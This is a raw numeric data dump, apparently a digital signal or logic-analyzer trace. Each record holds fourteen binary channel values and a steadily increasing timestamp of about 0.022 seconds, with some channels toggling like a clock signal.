1,1,1,0,1,0,0,0,0,0,0,0,0,1,2.2029500e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,2.2029528e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2029552e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2029580e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2029604e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2029628e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2029652e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2029680e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2029700e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2029728e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2029752e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2029780e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2029804e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2029828e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2029852e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2029880e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2029900e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2029928e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2029952e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2029980e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2030004e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2030028e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2030052e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2030076e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2030100e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2030128e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2030152e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2030180e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2030204e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2030228e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2030252e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2030276e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2030300e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2030328e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2030352e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2030380e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2030404e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2030428e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2030452e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2030476e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2030500e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2030528e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2030552e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2030604e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2030628e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2030652e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2030676e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2030728e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2030752e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2030804e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2030828e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2030876e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2030900e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2030956e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2030980e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2031028e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2031052e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2031104e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2031128e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2031152e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2031180e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2031204e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2031228e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2031252e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2031276e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2031300e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2031328e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2031352e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2031380e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2031404e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2031428e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2031452e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2031476e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2031500e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2031528e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2031580e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2031604e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2031628e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2031652e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2031676e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2031700e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2031728e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2031756e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2031780e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2031804e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2031828e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2031852e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2031876e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2031900e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2031928e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2031952e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2031980e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2032004e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2032028e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2032052e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2032076e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2032100e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2032156e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2032180e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2032204e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2032228e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2032252e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2032276e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2032300e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2032328e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2032352e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2032380e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2032404e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2032428e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2032452e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2032476e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2032500e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2032528e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2032552e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2032580e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2032604e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2032628e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2032652e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2032676e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2032700e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2032728e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2032752e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2032780e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2032804e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2032828e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2032852e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2032876e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2032900e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2032928e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2032952e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2032980e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2033004e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2033028e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2033052e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2033076e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2033100e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2033128e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2033152e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2033180e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2033204e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2033228e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2033252e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2033276e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2033300e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2033328e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2033352e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2033380e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2033404e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2033428e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2033452e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2033476e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2033500e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2033528e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2033552e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2033580e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2033604e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2033628e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2033652e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2033680e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2033700e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2033728e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2033752e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2033780e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2033804e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2033828e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2033852e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2033880e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2033900e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2033928e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2033952e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2033980e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2034004e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2034028e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2034052e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2034080e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2034100e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2034128e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2034152e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2034180e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2034204e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2034228e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2034252e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2034280e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2034300e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2034328e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2034352e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2034380e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2034404e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2034428e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2034452e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2034476e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2034500e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2034528e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2034552e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2034580e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2034604e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2034628e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2034652e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2034676e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2034700e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2034728e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2034752e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2034780e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2034804e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2034828e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2034852e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2034876e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2034900e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2034928e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2034952e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2034980e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2035004e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2035028e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2035052e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2035076e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2035100e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2035128e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2035152e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2035180e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2035204e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2035228e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2035252e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2035276e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2035300e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2035328e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2035352e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2035380e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2035404e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2035428e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2035452e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2035476e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2035500e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2035528e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2035552e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2035580e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2035604e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2035628e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2035652e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2035676e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2035700e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2035728e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2035752e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2035780e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2035804e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2035832e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.2035860e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.2035884e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,2.2160620e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,2.2160796e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,2.2160820e-02 0,0,0,1,1,0,0,0,0,0,0,1,0,1,2.2160852e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,2.2160872e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,2.2161180e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,2.2161204e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,2.2161228e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,2.2161252e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,2.2161276e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,2.2161300e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,2.2161328e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,2.2161352e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,2.2161380e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,2.2161404e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,2.2161428e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2161452e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2161476e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2161500e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2161528e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2161552e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2161580e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2161604e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2161628e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2161652e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2161676e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2161700e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2161728e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2161752e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2161780e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2161804e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2161828e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2161852e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2161876e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2161900e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2161928e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2161952e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2161980e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2162004e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2162028e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2162052e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2162076e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2162100e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2162128e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2162152e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2162180e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2162204e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2162228e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2162252e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2162276e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2162300e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2162328e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2162352e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2162380e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2162404e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2162428e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2162452e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,2.2162460e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,2.2162504e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,2.2162528e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2162536e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2162556e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,2.2162580e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,2.2162604e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,2.2162628e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,2.2162652e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,2.2162676e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,2.2162700e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,2.2162728e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,2.2162752e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,2.2162780e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,2.2162804e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,2.2162828e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,2.2162876e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,2.2162904e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2162908e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2162928e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2162952e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2162980e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2163004e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2163028e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2163052e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2163076e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2163100e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2163128e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2163152e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2163180e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2163204e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2163228e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2163252e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2163276e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2163300e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,2.2163308e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,2.2163356e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,2.2163380e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2163388e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2163404e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2163428e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2163452e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2163476e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2163500e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2163528e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2163552e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2163580e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2163604e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2163628e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2163652e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2163676e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2163700e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2163728e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2163752e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2163780e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2163804e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2163828e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2163876e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2163900e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,2.2163908e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,2.2163956e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,2.2163980e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2163988e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2164004e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2164028e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2164052e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2164076e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2164100e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2164124e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2164152e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2164180e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2164204e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2164228e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2164252e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2164276e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2164300e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2164324e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2164352e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2164380e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2164404e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2164428e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2164456e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2164480e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2164508e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2164532e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2164556e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2164580e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2164604e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2164628e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2164656e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2164680e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2164708e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2164732e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2164756e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2164780e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2164804e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2164828e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2164856e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2164880e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.2164908e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.2164932e-02 